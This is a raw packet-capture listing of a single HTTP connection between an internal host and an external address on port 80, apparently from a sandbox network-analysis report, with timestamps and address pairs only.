Oct 24, 2024 13:54:15.588545084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588591099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588598967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588632107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588638067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588669062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588677883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588702917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588709116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588738918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588743925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588776112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588779926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588812113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588839054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588845968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588851929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588886023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588887930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588921070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588927031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588956118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.588964939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.588998079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589010000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589045048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589057922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589081049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589085102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589116096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589121103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589164972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589190006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589231968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589287043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589329004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589339018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589373112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589380980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589407921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589415073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589442968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589462042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589478970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589488983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589514971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589521885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589550972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589556932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589591026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589628935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.589699984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.589972019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.590002060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.590018034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.590039968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700196981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700242043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700275898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700300932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700460911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700499058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700519085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700536013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700541973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700571060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700577021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700607061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700608969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700640917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.700647116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.700685978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704102039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704159975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704230070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704263926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704281092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704298973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704303026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704335928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704339027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704371929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704405069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704407930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704413891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704488039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704555035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704611063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704726934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704777956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704785109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704821110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704828024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704855919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704864025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704901934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704910040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704945087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704952955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.704979897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.704993963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705014944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705027103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705055952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705059052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705094099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705111027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705147982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705159903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705180883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705189943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705215931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705219984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705255032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705270052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705308914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705317020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705343008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705348969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705378056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705384970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705415964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705418110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705451965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705457926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705486059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705492020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705521107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705526114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705558062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705563068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705598116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705831051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705859900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705893993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705898046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705898046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705929995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705935955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705964088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.705972910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.705998898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706003904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706033945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706041098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706069946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706077099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706105947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706110001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706149101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706163883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706195116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706206083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706229925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706229925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706267118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706270933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706307888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706533909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706568956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.706588030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.706661940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.744920015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.744983912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.745034933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.745066881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.745081902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.745101929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.745115042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.745143890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815052986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815083981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815119028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815121889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815133095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815166950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815179110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815213919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815222025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815248966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815253973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815290928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815421104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815454960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815474033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815490007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.815496922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.815532923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818403006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818455935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818458080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818491936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818496943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818527937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818536043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818564892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818571091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818604946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818620920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818656921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818665028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818691969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818696976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818728924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818732023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818764925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818766117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818803072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818821907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818866014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818873882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818908930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818918943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818943024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.818944931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.818985939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819068909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819134951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819189072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819221973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819231033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819261074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819276094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819298983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819305897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819344044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819519997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819552898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819576025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819586039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819597960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819622993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819629908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819667101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819751024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819799900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819802046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819839001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819845915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819873095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819883108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819907904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.819915056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.819950104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820051908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820085049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820101976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820127010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820138931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820182085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820192099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820226908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820234060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820261955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820266008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820297956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820305109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820333958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820338964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820369005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820375919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820403099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820408106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820439100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820444107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820480108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820723057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820775032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820816040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820849895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820864916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820888042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.820893049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.820930958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.859687090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.859734058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.859772921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.859772921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.859807968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.859813929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.859822035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.859859943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930604935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930649042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930681944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930686951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930705070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930732012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930746078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930779934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930780888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930819988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930833101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930855989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930870056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930893898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.930897951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.930936098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934063911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934119940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934127092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934161901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934168100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934205055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934216976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934252977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934262991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934288025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934295893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934330940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934367895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934402943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934411049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934443951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934448004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934485912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934498072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934533119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934545040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934567928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934575081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934604883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934604883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934648991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934659004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934701920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934715033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934748888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934758902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934784889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934792042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:15.934823990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:15.934828043 CEST	49714	80	192.168.2.6	95.182.96.50
